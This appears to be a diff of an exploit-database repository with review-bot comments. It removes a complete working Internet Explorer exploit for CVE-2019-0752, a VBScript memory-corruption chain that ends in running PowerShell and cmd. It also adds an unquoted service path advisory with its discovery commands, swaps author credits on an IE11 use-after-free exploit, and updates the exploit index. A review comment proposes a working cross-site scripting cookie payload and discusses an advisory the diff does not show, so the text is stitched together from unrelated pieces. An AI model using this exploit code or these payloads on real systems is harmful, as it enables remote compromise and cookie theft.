Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||
Security GmbH]™
|
||||
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
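Review bot: The payload `test%20>"<script alert(document.cookie)></script>div style=1` does not execute anything — `<script alert(document.cookie)>` is a script element with a bogus attribute and an empty body, so the browser parses it and runs no code; the "Vulnerable Sources" excerpt therefore only proves the customer name is emitted unescaped in the traffic table, not that script runs in the admin's browser. A self-contained proof needs a payload that fires without a script body, e.g. `<img src=x onerror=alert(document.cookie)>`, or a capture of the admin's `admin_traffic.php` view showing the execution. The session log is also a POST to `admin_customers.php?...&page=customers&action=add` from a reseller account, which contradicts "Authentication Type: Restricted Authentication (Guest Privileges)" and step 1 "Register or login with a low privilege user account"; the advisory should state the minimum role that can actually store the name (the log suggests reseller, which changes the risk rating). Finally, the timeline records a vendor fix on 2020-10-12 but no fixed version is named; readers need the first release that contains the fix.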
|
|
@ -1,12 +1,11 @@
|
|||
# Exploit Title: Internet Explorer 11 - Use-After-Free
|
||||
# Google Dork: if applicable
|
||||
# Date: 2020-09-06
|
||||
# Exploit Author: Tgroup
|
||||
# Vendor Homepage: Microsoft.com
|
||||
# Version: IE 11 (REQUIRED)
|
||||
# Tested on: Windows 7 x64
|
||||
# Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free
|
||||
# Date: 2020-05-07
|
||||
# Exploit Author: maxpl0it
|
||||
# Vendor Homepage: https://www.microsoft.com/
|
||||
# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx
|
||||
# Version: IE 8, 9, 10, and 11
|
||||
# Tested on: Windows 7 (x64)
|
||||
# CVE : CVE-2020-0674
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
|
@ -15,7 +14,7 @@
|
|||
// -------------------------------------------------------------------------------------------------
|
||||
//
|
||||
// Credits:
|
||||
// Tgroup () - Writing the exploit
|
||||
// maxpl0it (@maxpl0it) - Writing the exploit
|
||||
// Qihoo 360 - Identifying the vulnerability in the wild
|
||||
//
|
||||
//
|
||||
|
@ -38,7 +37,8 @@
|
|||
// 11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
|
||||
//
|
||||
// Further notes:
|
||||
//
|
||||
// Video at https://twitter.com/maxpl0it/status/1253396942048104448
|
||||
//
|
||||
// The debug is better viewed in the console. Open Developer Tools and enable debug below.
|
||||
//
|
||||
// This is the non-EMET-bypassing version and only handles the stack pivot check and EAF.
|
34
exploits/windows/local/49066.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
|
||||
# Date: 2020-11-07
|
||||
# Exploit Author: Gerardo González
|
||||
# Vendor Homepage: https://consumer.huawei.com/mx
|
||||
# Software Link: https://consumer.huawei.com/mx
|
||||
# Version: 1.0.1.0
|
||||
# Tested on: Windows 10 Home Single Language x64 Esp
|
||||
|
||||
# Step to discover the unquoted Service:
|
||||
|
||||
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
|
||||
|
||||
# Service info:
|
||||
|
||||
Huawei LCD_Service LCD_Service C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe Auto
|
||||
|
||||
C:\Users\gerar>sc qc "LCD_Service"
|
||||
[SC] QueryServiceConfig CORRECTO
|
||||
|
||||
NOMBRE_SERVICIO: LCD_Service
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_INICIO : 2 AUTO_START
|
||||
CONTROL_ERROR : 1 NORMAL
|
||||
NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe
|
||||
GRUPO_ORDEN_CARGA :
|
||||
ETIQUETA : 0
|
||||
NOMBRE_MOSTRAR : Huawei LCD_Service
|
||||
DEPENDENCIAS :
|
||||
NOMBRE_INICIO_SERVICIO: LocalSystem
|
||||
|
||||
# A successful attempt would require the local user to be able to insert their code in the system root path
|
||||
# undetected by the OS or other security applications where it could potentially be executed during
|
||||
# application startup or reboot. If successful, the local user's code would execute with the elevated
|
||||
# privileges of the application.
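Review bot: The advisory shows the unquoted `C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe` running as LocalSystem with AUTO_START, but not the directory permissions that decide whether it is exploitable: a local user must be able to create `C:\Program.exe`, `C:\Program Files\Huawei.exe` or `C:\Program Files\Huawei\HwLcdEnhancement.exe`, and on a default Windows install neither file creation in `C:\` nor writes under `C:\Program Files` are granted to a standard user. Add the ACL evidence, e.g. `icacls "C:\Program Files\Huawei"` and `icacls "C:\Program Files\Huawei\HwLcdEnhancement"`, showing a write or modify grant to Users/Authenticated Users; without it this is a hardening weakness rather than a demonstrated privilege escalation. It would also help to state whether the user can restart the service (`sc stop LCD_Service` / `sc start LCD_Service`) or must wait for a reboot, since the closing note mentions both. "Unquote Service Path" in the title should read "Unquoted Service Path".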
|
|
@ -1,130 +0,0 @@
|
|||
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 -->
|
||||
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->
|
||||
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->
|
||||
|
||||
<!-- Tgroupcrew@gmail.com -->
|
||||
|
||||
<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->
|
||||
<!-- all the way to RCE using no shellcode. -->
|
||||
|
||||
<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->
|
||||
<!-- (h/t: James Forshaw, Google Project Zero) -->
|
||||
|
||||
<html>
|
||||
<meta http-equiv="x-ua-compatible" content="IE=8">
|
||||
<meta http-equiv="Expires" content="-1">
|
||||
<body>
|
||||
<div id="container1" style="overflow:scroll; width: 10px">
|
||||
<div id="content1" style="width:5000000px">
|
||||
Content
|
||||
</div>
|
||||
</div>
|
||||
<script language="VBScript.Encode">
|
||||
Dim ar1(&h3000000)
|
||||
Dim ar2(1000)
|
||||
Dim gremlin
|
||||
addressOfGremlin = &h28281000
|
||||
Class MyClass
|
||||
Private mValue
|
||||
Public Property Let Value(v)
|
||||
mValue = v
|
||||
End Property
|
||||
Public Default Property Get P
|
||||
P = mValue ' Where to write
|
||||
End Property
|
||||
End Class
|
||||
Sub TriggerWrite(where, val)
|
||||
Dim v1
|
||||
Set v1 = document.getElementById("container1")
|
||||
v1.scrollLeft = val ' Write this value (Maximum: 0x001767dd)
|
||||
Dim c
|
||||
Set c = new MyClass
|
||||
c.Value = where
|
||||
Set v1.scrollLeft = c
|
||||
End Sub
|
||||
' Our vulnerability does not immediately give us an unrestricted
|
||||
' write (though we could manufacture one). For our purposes, the
|
||||
' following is sufficient. It writes an arbitrary DWORD to an
|
||||
' arbitrary location, and sets the subsequent 3 bytes to zero.
|
||||
Sub WriteInt32With3ByteZeroTrailer(addr, val)
|
||||
TriggerWrite addr , (val) AND &hff
|
||||
TriggerWrite addr + 1, (val\&h100) AND &hff
|
||||
TriggerWrite addr + 2, (val\&h10000) AND &hff
|
||||
TriggerWrite addr + 3, (val\&h1000000) AND &hff
|
||||
End Sub
|
||||
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
|
||||
For i = 0 To Len(str) - 1
|
||||
TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
|
||||
Next
|
||||
End Sub
|
||||
Function ReadInt32(addr)
|
||||
WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
|
||||
ReadInt32 = ar1(gremlin)
|
||||
End Function
|
||||
Function LeakAddressOfObject(obj)
|
||||
Set ar1(gremlin + 1) = obj
|
||||
LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
|
||||
End Function
|
||||
Sub Exploit()
|
||||
' Corrupt vt of one array element (the "gremlin")
|
||||
TriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4
|
||||
For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
|
||||
If Not IsEmpty(ar1(i)) Then
|
||||
gremlin = i
|
||||
Exit For
|
||||
End If
|
||||
Next
|
||||
|
||||
If IsEmpty(gremlin) Then
|
||||
MsgBox "Could not find gremlin"
|
||||
Exit Sub
|
||||
End If
|
||||
|
||||
For i = 0 To UBound(ar2)
|
||||
Set ar2(i) = CreateObject("Scripting.Dictionary")
|
||||
Next
|
||||
|
||||
Set dict = ar2(UBound(ar2) / 2)
|
||||
addressOfDict = LeakAddressOfObject(dict)
|
||||
vtableOfDict = ReadInt32(addressOfDict)
|
||||
scrrun = vtableOfDict - &h11fc
|
||||
kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
|
||||
winExec = kernel32 + &h5d380
|
||||
|
||||
dict.Exists "dummy" ' Make a dispatch call, just to populate pld
|
||||
' Relocate pld to ensure its address doesn't contain a null byte
|
||||
pld = ReadInt32(addressOfDict + &h3c)
|
||||
fakePld = &h28281020
|
||||
For i = 0 To 3 - 1
|
||||
WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
|
||||
Next
|
||||
|
||||
fakeVtable = &h28282828 ' ASCII "(((("
|
||||
For i = 0 To 21
|
||||
If i = 12 Then ' Dictionary.Exists
|
||||
fptr = winExec
|
||||
Else
|
||||
fptr = ReadInt32(vtableOfDict + 4 * i)
|
||||
End If
|
||||
WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
|
||||
Next
|
||||
|
||||
WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
|
||||
WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
|
||||
WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
|
||||
|
||||
On Error Resume Next
|
||||
dict.Exists "dummy" ' Wheeee!!
|
||||
|
||||
' A little cleanup to help prevent crashes after the exploit
|
||||
For i = 1 To 3
|
||||
WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
|
||||
WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
|
||||
Next
|
||||
Erase Dict
|
||||
Erase ar2
|
||||
End Sub
|
||||
Exploit
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
|
@ -10379,7 +10379,7 @@ id,file,description,date,author,type,platform,port
|
|||
48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows,
|
||||
48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows,
|
||||
48803,exploits/linux/local/48803.py,"Gnome Fonts Viewer 3.34.0 - Heap Corruption",2020-09-11,"Cody Winkler",local,linux,
|
||||
48806,exploits/windows/local/48806.txt,"Internet Explorer 11 - Use-After-Free",2020-09-11,"Simon Zuckerbraun",local,windows,
|
||||
49062,exploits/windows/local/49062.txt,"Microsoft Internet Explorer 11 - Use-After-Free",2020-11-17,maxpl0it,local,windows,
|
||||
48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,
|
||||
48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
|
||||
48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
|
||||
|
@ -11198,6 +11198,7 @@ id,file,description,date,author,type,platform,port
|
|||
48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
|
||||
48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows,
|
||||
48789,exploits/windows/local/48789.txt,"BarracudaDrive v6.5 - Insecure Folder Permissions",2020-09-03,boku,local,windows,
|
||||
49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18139,7 +18140,6 @@ id,file,description,date,author,type,platform,port
|
|||
46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
|
||||
46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
|
||||
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
|
||||
46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
|
||||
46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
|
||||
46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
|
||||
46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
|
||||
|
@ -18296,6 +18296,8 @@ id,file,description,date,author,type,platform,port
|
|||
48651,exploits/multiple/remote/48651.txt,"Qmail SMTP 1.03 - Bash Environment Variable Injection",2020-07-08,1F98D,remote,multiple,
|
||||
48657,exploits/windows/remote/48657.py,"CompleteFTP Professional 12.1.3 - Remote Code Execution",2020-07-09,1F98D,remote,windows,
|
||||
48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux,
|
||||
49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple,
|
||||
49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -40868,11 +40870,14 @@ id,file,description,date,author,type,platform,port
|
|||
49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php,
|
||||
49046,exploits/php/webapps/49046.txt,"Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)",2020-11-16,"Matthew Aberegg",webapps,php,
|
||||
49048,exploits/php/webapps/49048.txt,"Water Billing System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49051,exploits/php/webapps/49051.txt,"Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49059,exploits/php/webapps/49059.txt,"Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection",2020-11-17,"Ramil Mustafayev",webapps,php,
|
||||
49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,
|
||||
49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php,
|
||||
49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49056,exploits/php/webapps/49056.txt,"Car Rental Management System 1.0 - 'car_id' Sql Injection",2020-11-16,"Mehmet Kelepçe",webapps,php,
|
||||
49058,exploits/php/webapps/49058.txt,"EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass",2020-11-17,"Kislay Kumar",webapps,php,
|
||||
49060,exploits/php/webapps/49060.txt,"SugarCRM 6.5.18 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
|
||||
49061,exploits/php/webapps/49061.txt,"WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
@ -43290,3 +43295,4 @@ id,file,description,date,author,type,platform,port
|
|||
48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,
|
||||
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
|
||||
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
|
||||
49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
|
||||
|
|